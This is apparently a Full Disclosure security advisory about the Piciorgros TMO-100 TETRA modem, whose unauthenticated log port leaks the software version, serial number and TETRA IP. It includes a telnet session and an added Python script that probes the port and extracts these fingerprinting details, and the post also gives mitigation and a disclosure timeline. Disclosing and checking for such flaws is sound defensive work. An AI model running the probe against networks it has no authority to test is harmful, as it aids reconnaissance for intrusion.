Message-ID: <AS8PR04MB8819F0D363C8BEDEBB1DA2B0F435A@AS8PR04MB8819.eurprd04.prod.outlook.com>
Date: Thu, 14 Aug 2025 15:25:22 +0000
From: Georg Lukas <lukas@...solutions.de>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Piciorgros TMO-100: Unauthorized log data access
PDF advisory: https://rt-solutions.de/piciorgros/Piciorgros_TMO-100_IP-Logger_en.pdf
Classification
--------------
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
- CVSS 4.0 Score: 5.3 / Medium
CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
- CVSS 3.1 Score: 4.3 / Medium
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Affected systems
----------------
- Piciorgros TMO-100 V3/V4 with software version below 4.20
(discovered in V3.72)
Summary
-------
The Piciorgros TMO-100 is a data modem for TETRA radio networks. It runs
an undocumented system log service that is reachable without
authentication on TCP port 51968 of the LAN interface. Anyone with
access to the LAN can therefore read some of the modem's operating
parameters (software and hardware version, serial number, IP address on
the TETRA side), e.g. to plan further attacks. Starting with software
version 4.20, the logger is only reachable for a 15-minute window after a
login to the web interface, so it is not exposed during normal
operation.
Details
-------
During a penetration test carried out on behalf of a customer, a
Piciorgros TMO-100 data modem was part of the test scope. The
documentation describes the so-called "IPLog" feature for collecting
diagnostic data for support requests to the manufacturer. This feature
is used through the manufacturer's IP Logger software. Under the hood,
that software simply connects to TCP port 51968 on the LAN interface,
where the modem sends its current system status followed by a live log
stream to any client, without any authentication:
$ telnet 192.168.0.199 51968
Trying 192.168.0.199...
Connected to 192.168.0.199.
Escape character is '^]'.
[FFFF] | 13.02.25 10:43:25 02:37:37.43 | **** Piciorgros TMO-100 V3.72 (HW-Rev. 3) Build 1819* Release (Apr 7 2021, 10:35:03) - Logging started ****
[FFFE] | 13.02.25 10:43:25 02:37:37.43 | Serial number: ███ Options: 8001 Set24: 0080 Set25: 0001
[FFFE] | 13.02.25 10:43:25 02:37:37.43 | TETRA core SW versions: Stack:0454, DSP:0456, MMI:F444
[F020] | 13.02.25 10:43:38 02:37:51.16 | TETRA CREG state change: 1 -> 99:1:0
…
[E000] | 13.02.25 10:44:34 02:38:46.63 | TETRA registration information: 1:0:0.
[F020] | 13.02.25 10:44:41 02:38:53.97 | PPP: Is up.
[E000] | 13.02.25 10:44:41 02:38:53.98 | PPP link is up in try 1. Own IP: 10.14.42.31
…
The log shows the IP address of the modem in the TETRA network, which
can be used to carry out attacks on other devices in the TETRA data
network.
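The record format above is regular enough to parse. The following Python script is an added example, not part of this advisory and not tooling from Piciorgros or rt-solutions: it parses logger records of the shape "[TAG] | date time uptime | message", extracts the fields an attacker would harvest (software version, hardware revision, serial number, TETRA core versions, TETRA-side IP address) and flags software versions below 4.20. Given a host on the command line it also probes TCP port 51968 and reports whether the logger answers without authentication, which is a quick way for an operator to confirm the exposure or to verify the update. The sample stream embedded in the script is constructed from the records shown above, with the redacted serial number replaced by a placeholder. The regular expressions, the latin-1 decoding and the assumption that an updated modem outside its 15-minute window either refuses the connection or sends nothing are mine, not documented behaviour.

```python
import re
import socket
import sys

# Port observed in the advisory's telnet session (LAN-side logger service).
LOG_PORT = 51968

# One logger record: "[TAG] | dd.mm.yy HH:MM:SS uptime | message".
# Pattern is an assumption derived from the records in the advisory.
RECORD_RE = re.compile(
    r"^\[(?P<tag>[0-9A-Fa-f]{4})\]\s*\|\s*"
    r"(?P<date>\d{2}\.\d{2}\.\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"(?P<uptime>\d{2}:\d{2}:\d{2}\.\d{2})\s*\|\s*(?P<msg>.*)$"
)
VERSION_RE = re.compile(r"Piciorgros TMO-100 V(?P<sw>\d+\.\d+) \(HW-Rev\. (?P<hw>\d+)\)")
SERIAL_RE = re.compile(r"Serial number:\s*(?P<serial>\S+)")
CORE_RE = re.compile(r"TETRA core SW versions:\s*(?P<core>.+)$")
PPP_IP_RE = re.compile(r"Own IP:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")

# Constructed sample: the advisory's records, one per line as sent on the
# wire, with the redacted serial number replaced by a placeholder.
SAMPLE_STREAM = (
    "[FFFF] | 13.02.25 10:43:25 02:37:37.43 | **** Piciorgros TMO-100 V3.72 "
    "(HW-Rev. 3) Build 1819* Release (Apr 7 2021, 10:35:03) - Logging started ****\n"
    "[FFFE] | 13.02.25 10:43:25 02:37:37.43 | Serial number: REDACTED Options: "
    "8001 Set24: 0080 Set25: 0001\n"
    "[FFFE] | 13.02.25 10:43:25 02:37:37.43 | TETRA core SW versions: "
    "Stack:0454, DSP:0456, MMI:F444\n"
    "[F020] | 13.02.25 10:43:38 02:37:51.16 | TETRA CREG state change: 1 -> 99:1:0\n"
    "[E000] | 13.02.25 10:44:34 02:38:46.63 | TETRA registration information: 1:0:0.\n"
    "[F020] | 13.02.25 10:44:41 02:38:53.97 | PPP: Is up.\n"
    "[E000] | 13.02.25 10:44:41 02:38:53.98 | PPP link is up in try 1. Own IP: 10.14.42.31\n"
)


def parse_records(text):
    """Split raw logger output into records; lines that do not match are ignored."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def fingerprint(records):
    """Collect the information an attacker can harvest from the log stream."""
    info = {"sw_version": None, "hw_rev": None, "serial": None,
            "core_versions": None, "tetra_ip": None, "ppp_up": False}
    for rec in records:
        msg = rec["msg"]
        if m := VERSION_RE.search(msg):
            info["sw_version"], info["hw_rev"] = m["sw"], int(m["hw"])
        if m := SERIAL_RE.search(msg):
            info["serial"] = m["serial"]
        if m := CORE_RE.search(msg):
            info["core_versions"] = m["core"].strip()
        if m := PPP_IP_RE.search(msg):
            info["tetra_ip"] = m["ip"]
        if msg.startswith("PPP: Is up"):
            info["ppp_up"] = True
    return info


def is_vulnerable_version(sw_version):
    """Below 4.20 the logger is permanently reachable (per the advisory)."""
    major, minor = (int(x) for x in sw_version.split(".", 1))
    return (major, minor) < (4, 20)


def assess(text):
    """Parse a captured stream and summarise exposure and version status."""
    records = parse_records(text)
    info = fingerprint(records)
    info["exposed"] = bool(records)
    info["outdated"] = (is_vulnerable_version(info["sw_version"])
                        if info["sw_version"] else None)
    return info


def probe(host, port=LOG_PORT, timeout=3.0, max_bytes=4096):
    """Connect to the logger port and return what the modem sends unsolicited.
    None means the port is closed or filtered; "" means it accepted the
    connection but sent nothing within the timeout (assumed behaviour of an
    updated modem outside its 15-minute window). Needs network access."""
    chunks, received = [], 0
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            while received < max_bytes:
                try:
                    data = s.recv(1024)
                except socket.timeout:
                    break
                if not data:
                    break
                chunks.append(data)
                received += len(data)
    except OSError:
        return None
    return b"".join(chunks).decode("latin-1")  # encoding is an assumption


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    stream = probe(target) if target else SAMPLE_STREAM
    if stream is None:
        print(f"{target}: port {LOG_PORT} closed or filtered")
        sys.exit(0)
    result = assess(stream)
    state = "EXPOSED (unauthenticated logger answered)" if result["exposed"] else "no records received"
    print(f"{target or 'sample'}: {state}")
    for key in ("sw_version", "hw_rev", "serial", "core_versions", "tetra_ip", "outdated"):
        print(f"  {key}: {result[key]}")
```

Run it without arguments to see the parser applied to the constructed sample, or with a modem's LAN address to probe the live port. An "exposed" result on a modem reporting a version of 4.20 or higher is expected only within 15 minutes of a web login; seeing it at any other time would mean the update did not take effect.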
Impact
------
An attacker with LAN access to a TMO-100 modem can determine the
hardware revision and software version in use, the serial number, and
the modem's IP address in the TETRA data network, and can use that
address as a starting point for scanning neighboring address ranges in
the TETRA data network through the modem.
Mitigation for operators
------------------------
The modems should be updated to software version 4.20 or higher. Note
that the update narrows the exposure rather than removing it: the logger
remains reachable without authentication for 15 minutes after each web
login, so LAN access to the modem should also be restricted to trusted
hosts.
Recommendations for the manufacturer
------------------------------------
Access to the logger should be authenticated in the same way as the web
interface and, if possible, encrypted using TLS. Exposing the log stream
through WebSockets or another API of the web UI, under the web UI's
session handling, would be a viable alternative to the separate
unauthenticated port.
Timeline
--------
- 2025-02-13 Discovery of the vulnerability
- 2025-02-27 Notification to the manufacturer
- 2025-03-06 Confirmation of the vulnerability by the manufacturer
- 2025-03-11 Release of software version V4.20 by the manufacturer
- 2025-08-14 Publication of the vulnerability as part of responsible
disclosure
--
Dr.-Ing. Georg Lukas
rt-solutions.de GmbH
Oberländer Ufer 190a
D-50968 Köln
Zentrale: (+49)221 93724 0
Web: www.rt-solutions.de
rt-solutions.de
experts you can trust.
Sitz der Gesellschaft: Köln
Eingetragen beim Amtsgericht Köln: HRB 52645
Geschäftsführer: Prof. Dr. Ralf Schumann, Dr. Stefan Schemmer
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/